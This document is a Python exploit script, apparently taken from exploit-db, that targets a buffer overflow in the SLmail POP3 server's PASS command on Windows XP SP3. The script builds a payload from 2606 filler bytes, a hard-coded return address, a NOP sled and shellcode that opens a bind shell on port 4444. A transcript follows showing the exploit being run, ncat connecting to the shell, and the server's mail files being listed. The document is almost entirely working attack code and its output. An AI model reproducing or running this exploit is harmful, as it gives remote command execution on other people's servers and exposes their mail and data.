https://www.exploit-db.com/exploits/638/
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
import socket
import struct
#
# Tested against the setup below. The hard-coded offset (2606) and return
# address (0x5f4a358f) used further down were obtained on this installation
# and may not hold for another build of the OS or of the mail server.
# OS Name: Microsoft Windows XP Professional
# OS Version: 5.1.2600 Service Pack 3 Build 2600
#
BUFSIZE = 1024  # bytes read per recv() when draining the server banner / command replies
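def _to_bytes(value):
    """Return *value* as raw bytes without altering a single byte.

    bytes (str on Python 2) is returned untouched; a text string is
    encoded with latin-1, whose code points 0-255 map 1:1 onto bytes, so
    a payload written as "\\xbd..." reaches the wire byte-exact instead of
    being UTF-8-expanded to two bytes as a plain .encode() would do.
    """
    if isinstance(value, bytes):
        return value
    return value.encode("latin-1")


def login(host, port, username, password, timeout=10.0):
    """Send a POP3 USER/PASS pair to *host*:*port* and close the connection.

    The greeting banner and the reply to USER are read and discarded so
    that PASS is only sent once the server is ready for it. The reply to
    PASS is deliberately not read: when *password* carries the overflow
    payload the service is expected to stop answering, and a blocking
    recv() at that point would hang the script.

    Args:
        host: target address.
        port: target TCP port (POP3 is normally 110).
        username: value for the USER command, str or bytes.
        password: value for the PASS command, str or bytes; sent byte-exact
            (see _to_bytes), which is what an overflow payload needs.
        timeout: seconds to wait on connect()/recv() before giving up, so a
            wedged or already-crashed target cannot hang the script; pass
            None to block indefinitely as the original code did.

    Returns:
        None.

    Raises:
        socket.error / socket.timeout from connect, recv or sendall. The
        socket is closed on every path, including errors.
    """
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.settimeout(timeout)
    try:
        client.connect((host, port))
        client.recv(BUFSIZE)  # greeting banner, not needed
        # sendall() keeps writing until every byte is out; send() may
        # return after a partial write and silently truncate the payload.
        client.sendall(b"USER " + _to_bytes(username) + b"\r\n")
        client.recv(BUFSIZE)  # reply to USER, not needed
        client.sendall(b"PASS " + _to_bytes(password) + b"\r\n")
    finally:
        client.close()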
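def chars_generator(char="A", step=200, count=30):
    """Build the fixed-step fuzzing strings used to find the crash length.

    Returns ``[char * step, char * 2 * step, ..., char * count * step]``.
    With the defaults that is 200, 400, ..., 6000 bytes of "A" -- the
    lengths one would feed to the PASS command one by one to find the
    range in which the service stops answering.

    Args:
        char: filler character (or string) to repeat.
        step: length increment between consecutive entries.
        count: number of entries to produce; 0 gives an empty list.

    Returns:
        list of str, length *count*, in increasing length order.

    Note: not called by this script's main block; it is the fuzzing helper
    from which the fixed 2606-byte offset used there was presumably derived.
    """
    return [char * (i * step) for i in range(1, count + 1)]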
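if __name__ == "__main__":
    # Usage: <target ip> [port]; the port defaults to POP3's 110.
    if len(sys.argv) not in (2, 3):
        print("[*] Usage: {} <target ip> [port]".format(sys.argv[0]))
        sys.exit(1)  # a usage error is a failure: exit non-zero, not 0
    host = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) == 3 else 110

    # Layout of the PASS argument, front to back:
    #   2606 bytes of filler    -> reaches the saved return address
    #   4-byte return address   -> 0x5f4a358f, little-endian, lands in EIP
    #   16-byte NOP sled        -> slack before the shellcode
    #   shellcode               -> 355 bytes as listed below
    # Bad chars: 00 0a -- neither may occur anywhere after the filler. The
    #   payload travels as one CRLF-terminated POP3 line, so 0d is
    #   presumably unusable as well; none of the three appears below.
    # EIP: 0x5f4a358f -- assumed to be a jump-to-ESP gadget that is stable
    #   across runs on the tested build; re-verify on any other version.
    OFFSET = 2606
    RET_ADDR = 0x5f4a358f

    # Everything is assembled as bytes: under Python 3 a str literal such
    # as "\xbd" would be UTF-8-encoded to two bytes on the wire and corrupt
    # the shellcode; under Python 2, b"..." and "..." are the same type, so
    # the behaviour there is unchanged.
    nop_sled = b"\x90" * 16
    shellcode = (
        b"\xbd\x47\xb0\x28\x21\xdb\xd7\xd9\x74\x24\xf4\x58\x31"
        b"\xc9\xb1\x53\x83\xc0\x04\x31\x68\x0e\x03\x2f\xbe\xca"
        b"\xd4\x53\x56\x88\x17\xab\xa7\xed\x9e\x4e\x96\x2d\xc4"
        b"\x1b\x89\x9d\x8e\x49\x26\x55\xc2\x79\xbd\x1b\xcb\x8e"
        b"\x76\x91\x2d\xa1\x87\x8a\x0e\xa0\x0b\xd1\x42\x02\x35"
        b"\x1a\x97\x43\x72\x47\x5a\x11\x2b\x03\xc9\x85\x58\x59"
        b"\xd2\x2e\x12\x4f\x52\xd3\xe3\x6e\x73\x42\x7f\x29\x53"
        b"\x65\xac\x41\xda\x7d\xb1\x6c\x94\xf6\x01\x1a\x27\xde"
        b"\x5b\xe3\x84\x1f\x54\x16\xd4\x58\x53\xc9\xa3\x90\xa7"
        b"\x74\xb4\x67\xd5\xa2\x31\x73\x7d\x20\xe1\x5f\x7f\xe5"
        b"\x74\x14\x73\x42\xf2\x72\x90\x55\xd7\x09\xac\xde\xd6"
        b"\xdd\x24\xa4\xfc\xf9\x6d\x7e\x9c\x58\xc8\xd1\xa1\xba"
        b"\xb3\x8e\x07\xb1\x5e\xda\x35\x98\x36\x2f\x74\x22\xc7"
        b"\x27\x0f\x51\xf5\xe8\xbb\xfd\xb5\x61\x62\xfa\xba\x5b"
        b"\xd2\x94\x44\x64\x23\xbd\x82\x30\x73\xd5\x23\x39\x18"
        b"\x25\xcb\xec\xb5\x2d\x6a\x5f\xa8\xd0\xcc\x0f\x6c\x7a"
        b"\xa5\x45\x63\xa5\xd5\x65\xa9\xce\x7e\x98\x52\xe1\x22"
        b"\x15\xb4\x6b\xcb\x73\x6e\x03\x29\xa0\xa7\xb4\x52\x82"
        b"\x9f\x52\x1a\xc4\x18\x5d\x9b\xc2\x0e\xc9\x10\x01\x8b"
        b"\xe8\x26\x0c\xbb\x7d\xb0\xda\x2a\xcc\x20\xda\x66\xa6"
        b"\xc1\x49\xed\x36\x8f\x71\xba\x61\xd8\x44\xb3\xe7\xf4"
        b"\xff\x6d\x15\x05\x99\x56\x9d\xd2\x5a\x58\x1c\x96\xe7"
        b"\x7e\x0e\x6e\xe7\x3a\x7a\x3e\xbe\x94\xd4\xf8\x68\x57"
        b"\x8e\x52\xc6\x31\x46\x22\x24\x82\x10\x2b\x61\x74\xfc"
        b"\x9a\xdc\xc1\x03\x12\x89\xc5\x7c\x4e\x29\x29\x57\xca"
        b"\x59\x60\xf5\x7b\xf2\x2d\x6c\x3e\x9f\xcd\x5b\x7d\xa6"
        b"\x4d\x69\xfe\x5d\x4d\x18\xfb\x1a\xc9\xf1\x71\x32\xbc"
        b"\xf5\x26\x33\x95"
    )
    password = b"".join([
        b"A" * OFFSET,
        struct.pack("<L", RET_ADDR),
        nop_sled,
        shellcode,
    ])

    # The username plays no part in the overflow; only the PASS line does.
    login(host, port, "test", password)
    # "successfully" only means the payload left the socket without error.
    # Whether a shell actually spawned must be checked separately, e.g. by
    # connecting to the listener the shellcode opens (the transcript at the
    # end of this file connects to TCP/4444 on the target).
    print('[*] exploit {}:{} successfully'.format(host, port))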
$ python exploit_SLmail.py 192.168.1.103
[*] exploit 192.168.1.103:110 successfully
$ ncat -v 192.168.1.103 4444
Ncat: Version 7.00 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.1.103:4444.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\SLmail\System>dir
dir
Volume in drive C has no label.
Volume Serial Number is 941B-AE79
Directory of C:\Program Files\SLmail\System
07/26/2016 04:15 PM <DIR> .
07/26/2016 04:15 PM <DIR> ..
11/19/2002 11:40 AM 3,358 listrcrd.txt
07/26/2016 03:55 PM 1,834 maillog.000
07/26/2016 11:28 PM 340,103 maillog.txt
07/26/2016 04:14 PM 12,288 RegBack.reg
07/26/2016 11:21 PM 34,958 root.mbx
5 File(s) 392,541 bytes
2 Dir(s) 1,668,247,552 bytes free
C:\Program Files\SLmail\System>